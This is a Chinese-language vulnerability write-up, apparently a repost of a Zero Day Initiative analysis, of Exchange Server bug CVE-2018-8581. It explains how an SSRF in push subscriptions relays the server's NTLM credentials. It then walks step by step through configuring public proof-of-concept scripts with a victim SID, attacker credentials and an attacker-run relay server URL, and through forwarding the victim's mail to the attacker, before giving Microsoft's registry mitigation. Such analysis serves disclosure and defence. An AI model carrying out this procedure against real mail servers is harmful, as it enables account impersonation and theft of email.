EXCHANGE上冒充任意用户--Exchange Server权限提升漏洞(CVE-2018-8581)分析

分手后的思念是犯贱 2024-03-31 11:38 31阅读 0赞

### 0x00 前言 ###

这是我们2018年Top 5趣案系列中的第三个案例。这些漏洞都有一些因素使它们从今年发布的大约1，400个报告中脱颖而出。今天我们将分析一个Exchange漏洞，它允许任何经过身份验证的用户冒充Exchange Server上的其他用户。

在ZDI的Dustin Childs 12月的[文章][Link 1] 中，他提到了一个Exchange漏洞，允许Exchange服务器上的任何用户冒充该Exchange服务器上的任何人。虽然这个漏洞可以用于一些内网的劫持，但这个漏洞更有可能被用于钓鱼活动、窃取数据或其他恶意软件操作。作为2018年Top 5趣案系列的一部分，本文深入研究了这个SSRF(服务器端请求伪造)漏洞的细节，并展示了冒充过程是如何实现的。

### 0x01 漏洞分析 ###

该漏洞是由SSRF漏洞和其他漏洞相结合造成的。Exchange允许任何用户为推送订阅指定所需的URL，服务器将尝试向这个URL发送通知。问题出在Exchange服务器使用[CredentialCache.DefaultCredentials][]进行连接：

![332d3dad2c6d222eeddafebbe9a93a1f.png][]

在Exchange Web服务中，CredentialCache.DefaultCredentials在NT AUTHORITYSYSTEM上运行。这将导致Exchange Server向攻击者的服务器发送NTLM散列。Exchange服务器还默认设置了以下注册表项：HKEY\_LOCAL\_MACHINESYSTEMCurrentControlSetControlLsaDisableLoopbackCheck = 1

这允许我们使用这些NTLM散列来进行HTTP身份验证。例如，可以使用这些散列来访问Exchange Web服务(EWS)。由于它在NT AUTHORITYSYSTEM级别运行，攻击者可以获得TokenSerializationRight的“特权”会话，然后可以使用SOAP请求头来冒充任何用户。

下面是这样一个SOAP请求头的例子，它用SID S-1-5-21-4187549019-2363330540-1546371449-500冒充管理员。

![4afaa0e2b6577664b7c479749fd54cad.png][]

[![26860cafee9cd69cc48c8adcd55229e1.png][]][26860cafee9cd69cc48c8adcd55229e1.png 1]

### 0x02 漏洞利用 ###

为了演示，我们将使用几个Python脚本：

serverHTTP\_relayNTLM.py– 通过入站连接获取NTLM散列并用于EWS身份验证

exch\_EWS\_pushSubscribe.py – 导致PushSubscription EWS调用serverHTTP\_relayNTLM.py

你可以在[这里][Link 2]下载这些脚本。你还需要python-NTLM模块。

漏洞的第一步是获取我们要冒充的用户的SID。一种可能的使用方法是这样的：

1.以授权用户身份登录OWA。在这里，我们以“攻击者”身份登录：

[![792564c06ec6d79ff3941cab7d67fc34.png][]][792564c06ec6d79ff3941cab7d67fc34.png 1]

![7ea690996517a9f079e169f24c6f6b02.png][]

2.接下来，创建任意新文件夹。在这个例子中，我们使用了temfold。点击context中“Permissions…”选项：

[![750fa9a18fa5d0b508bcb2415f14702e.png][]][750fa9a18fa5d0b508bcb2415f14702e.png 1]

![763faad98d46b4ece9f32ea59bb86164.png][]

3.在这里，添加要冒充的人的电子邮件。我们的目标是受害者[victim@contoso.local][victim_contoso.local]：

[![ce94577304ef6f94feccdd2e546dd798.png][]][ce94577304ef6f94feccdd2e546dd798.png 1]

![cc0ab015c52ca86b1840bfa6d6cec449.png][]

4.现在我们需要按F12键并选择Network选项。然后在新文件夹中再次选择context中“Permissions…”选项。

[![a952b84d2b7ab90292b5e23f528c33aa.png][]][a952b84d2b7ab90292b5e23f528c33aa.png 1]

![d5dee18745d99edd18b59fa1b9c01aef.png][]

5.我们需要检查第一个service.svc?action=GetFolder请求的响应。查看方法：

Body->ResponseMessages->Items->0->Folders->0->PermissionSet->Permissions->N->UserId->SID

在这个例子中，N是2(最新的)，但是你可以全部检查一遍以便找到正确的。PrimarySmtpAddress应该是理想的受害者。如果响应不包含PermissionSet项，则需要检查另一个service.svc?action=GetFolder请求。

[![a79fbd47a14681bf2da7a411193d641a.png][]][a79fbd47a14681bf2da7a411193d641a.png 1]

![703cfa3ec979ed96dbbb5964956b29ba.png][]

6.我们将在serverHTTP\_relayNTLM.py中使用这个SID来冒充受害者。另外，我们还需要选择在攻击者控制的计算机上不太可能被阻止的TCP端口，这些端口将允许Exchange Server上的外部连接。例如，TCP端口8080可能可用。现在，让我们用真实信息更改serverHTTP\_relayNTLM.py中的下一行：

[![fa3b4004d49771505c955c6eff1570db.png][]][fa3b4004d49771505c955c6eff1570db.png 1]

\#Port for the HTTP server

\#Should be the same as in EVIL\_HTTPSERVER\_URL in Exch\_EWS\_pushSubscribe.py

HTTPPORT = 8080

#You have to replace next values by valid ip/address, port and protocol ('http' or 'https') to EWS 
    target_ip='exch2016.contoso.local'
    target_port = 443
    PROTO='https'
    #PROTO='http'
    
    
    #Path to EWS
    URL = "/EWS/Exchange.asmx"
    
    
    #SMTP addresses of attacker mailbox (we will receive all emails sent to victim) 
    ATTACKER = "attacker@contoso.local"
    VICTIM_SID = "S-1-5-21-4187549019-2363330540-1546371449-2604"

![3427dc95a3e2f2de7814b72857726dbe.png][]

*一旦脚本有了正确的变量，就可以启动了：*

*![200996e5dce67bb17fe298c3426d9518.png][]*

[![Image 1][]][Image 1 1]

7.下一步是在Exch\_EWS\_PushSubscribe.py脚本中设置适当的变量：

[![d32f1313e2748a9e997da2cffa6dcc05.png][]][d32f1313e2748a9e997da2cffa6dcc05.png 1]

#You have to replace next values by valid ip/address, port and protocol ('http' or 'https')
    ip='exch2016.contoso.local'
    tcp_port = 443
    #PROTO='http'
    PROTO='https'
    
    #Credentials of attacker
    USER = 'attacker'
    DOMAIN = 'contoso.local'
    PASS = 'P@ssw0rd'
    URL = "/EWS/Exchange.asmx"
    
    #URL of our HTTP server that will use NTLM hashes for impersonation of victim 
    
    EVIL_HTTPSERVER_URL = "http://192.168.50.173:8080/test"

![81dc1f4c12c4ab1e359a2662bea5cfa2.png][]

一旦完成，我们就可以执行以下脚本：

![789a4b24447945553a109319dce40bab.png][]

[![Image 1][]][Image 1 2]

8.最后一步。我们需要一些事件触发推送通知。如果可以等待一段时间，或者我们也可以执行一些操作，比如创建和发送新的电子邮件，或者删除我们的新文件

![82f06a903a86688458f39db7ceccce41.png][]

如果成功，我们应该接收从Exchange服务器到serverHTTP\_relayNTLM.py的入站连接：

[![Image 1][]][Image 1 3]

如果攻击成功，我们将在最后一个响应中看到UpdateInboxRulesResponse ResponseClass=“Success”。这意味着入站规则已添加到受害者邮箱中，所有入站电子邮件都将转发给攻击者。

现在一切就绪，是时候测试了。我们需要从任意帐户向受害者发送电子邮件，但与我们新规则中的目的地不相同(在本例是[attacker@contoso.local][attacker_contoso.local])，因为如果源和目的地是相同的地址，则该规则不会转发电子邮件。让我们以管理员身份登录并向受害者发送一些“敏感”信息：

![336ac62522777fcef8d3da5059f210f3.png][]

[![252d66d515b07416172409cac6026a1f.png][]][252d66d515b07416172409cac6026a1f.png 1]

检查攻击者的收件箱，我们看到消息成功转发：

![f98105ea3746510c9feea6ebaeda6f0d.png][]

[![dd0e61b962bebfc4a0db23ae06d8028c.png][]][dd0e61b962bebfc4a0db23ae06d8028c.png 1]

正如我们所看到的，新的邮件被转发给攻击者。类似的结果可以通过其他EWS API实现，比如AddDelegate或将编辑权限分配给目标文件夹。

### 0x03 补丁 ###

微软将该漏洞分配为CVE-2018-8581，并在11月份发布时给出[缓解措施][Link 3]。实际上这个漏洞还没有修补程序。相反，Microsoft强调应该删除注册表项。删除这个键可启用回送检查。回想上面的内容，Exchange服务器默认设置了以下注册表项：

HKEY\_LOCAL\_MACHINESYSTEMCurrentControlSetControlLsaDisableLoopbackCheck = 1

如果删除HKEY\_LOCAL\_MACHINESYSTEMCurrentControlSetControlLsaDisableLoopbackCheck键，则漏洞不可以。若要删除注册表项，请在CMD窗口中输入以下命令：

[![ae80ae9f4bf942919737a331d2838e2a.png][]][ae80ae9f4bf942919737a331d2838e2a.png 1]

删除密钥后不需要重新启动或Exchange Server。公告指出，将来Exchange的更新在默认情况下将不再启用注册表项。

### 0x04 总结 ###

电子邮件已经成为我们商业生活的核心组成部分，Exchange Server多年来一直是一个热门的目标。该漏洞允许冒充用户，通过以前报告的[漏洞][Link 4]允许任意代码执行。这两种情况都表明，有时最大的安全风险来自内部。这些漏洞还展示了外部攻击者如何从单个入口点在整个企业中扩散。

[Link 1]: https://www.zerodayinitiative.com/blog/2018/12/11/the-december-2018-security-update-review
[CredentialCache.DefaultCredentials]: https://docs.microsoft.com/en-us/dotnet/api/system.net.credentialcache.defaultcredentials
[332d3dad2c6d222eeddafebbe9a93a1f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/fa857974df8a47e69db5b1887fa678b4.png
[4afaa0e2b6577664b7c479749fd54cad.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/e8870978a3ba4d5bac0ed4a609cf9cfb.png
[26860cafee9cd69cc48c8adcd55229e1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/8e6f9ce1e6774ee3b26b7578f2aa3ceb.png
[26860cafee9cd69cc48c8adcd55229e1.png 1]: https://p0.ssl.qhimg.com/t011c75498707bf811a.png
[Link 2]: https://github.com/thezdi/PoC/tree/master/CVE-2018-8581
[792564c06ec6d79ff3941cab7d67fc34.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/1fdd0f2128264b81934ff83907046ab7.png
[792564c06ec6d79ff3941cab7d67fc34.png 1]: https://p5.ssl.qhimg.com/t01202417bfc6e782b2.png
[7ea690996517a9f079e169f24c6f6b02.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/ea9cda3ef41847d2a97ab702d65b35dd.png
[750fa9a18fa5d0b508bcb2415f14702e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/b4e7b6728c4f4f0db1aea1f77ed0f3fc.png
[750fa9a18fa5d0b508bcb2415f14702e.png 1]: https://p2.ssl.qhimg.com/t017a013feedf7ab3fc.png
[763faad98d46b4ece9f32ea59bb86164.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/b9838a58318e4991b561d3ccc9a7be9b.png
[victim_contoso.local]: mailto:victim@contoso.local
[ce94577304ef6f94feccdd2e546dd798.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/62b9054381664daab89bead40a377857.png
[ce94577304ef6f94feccdd2e546dd798.png 1]: https://p2.ssl.qhimg.com/t0173e9216820cfcd87.png
[cc0ab015c52ca86b1840bfa6d6cec449.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/6d00f013200a469e99632e0cf744c454.png
[a952b84d2b7ab90292b5e23f528c33aa.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/bd3720488db040eb9a57304eaac320b2.png
[a952b84d2b7ab90292b5e23f528c33aa.png 1]: https://p0.ssl.qhimg.com/t016c5bbc73af8419b2.png
[d5dee18745d99edd18b59fa1b9c01aef.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/0f9f426f8a2e4f3b868f9a44465d0cc6.png
[a79fbd47a14681bf2da7a411193d641a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/c85e1b1442604f2b8bb26ed9360dbc7a.png
[a79fbd47a14681bf2da7a411193d641a.png 1]: https://p1.ssl.qhimg.com/t01d0bce3fc1d5735ec.png
[703cfa3ec979ed96dbbb5964956b29ba.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/e6bb9d808e3d413d9f035908e8c47610.png
[fa3b4004d49771505c955c6eff1570db.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/1d2560ef900641b4bea3d79a109507a0.png
[fa3b4004d49771505c955c6eff1570db.png 1]: https://p0.ssl.qhimg.com/t01e7b77ec69be2b585.png
[3427dc95a3e2f2de7814b72857726dbe.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/cc084534f91141cab19d1e32e8b6bbf7.png
[200996e5dce67bb17fe298c3426d9518.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/ddda57fcbabc4c11b561514b06cbd873.png
[Image 1]: 
[Image 1 1]: https://p0.ssl.qhimg.com/t017b7116cbf397a5b3.png
[d32f1313e2748a9e997da2cffa6dcc05.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/97aa265481f34339937bd550fe0749b5.png
[d32f1313e2748a9e997da2cffa6dcc05.png 1]: https://p4.ssl.qhimg.com/t01d7983698dad57156.png
[81dc1f4c12c4ab1e359a2662bea5cfa2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/2acfba33656b473b8c465421da8dd5ec.png
[789a4b24447945553a109319dce40bab.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/2828bda6927c408f87ed338726a3606b.png
[Image 1 2]: https://p5.ssl.qhimg.com/t01e57e1921c02b4f45.png
[82f06a903a86688458f39db7ceccce41.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/21e628bc32d6441abef2180c2e856a62.png
[Image 1 3]: https://p1.ssl.qhimg.com/t01d7fe2de8ab083720.png
[attacker_contoso.local]: mailto:attacker@contoso.local
[336ac62522777fcef8d3da5059f210f3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/2fc7e3427b4947b4aa3e3b2f0d2ab87b.png
[252d66d515b07416172409cac6026a1f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/df948c3cf6264259abd3833933d4b9b1.png
[252d66d515b07416172409cac6026a1f.png 1]: https://p1.ssl.qhimg.com/t0175fa2c07f45c78e0.png
[f98105ea3746510c9feea6ebaeda6f0d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/c71b8356f39d4668a8bd55b60b357576.png
[dd0e61b962bebfc4a0db23ae06d8028c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/c4a7b033b812417a8b47afb2a7d57f55.png
[dd0e61b962bebfc4a0db23ae06d8028c.png 1]: https://p4.ssl.qhimg.com/t0138b03e3c3bcc04df.png
[Link 3]: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
[ae80ae9f4bf942919737a331d2838e2a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/3e36c77db4d84b358d09df780c36944c.png
[ae80ae9f4bf942919737a331d2838e2a.png 1]: https://p3.ssl.qhimg.com/t01f40b680305f67eee.png
[Link 4]: https://www.zerodayinitiative.com/blog/2018/8/14/voicemail-vandalism-getting-remote-code-execution-on-microsoft-exchange-server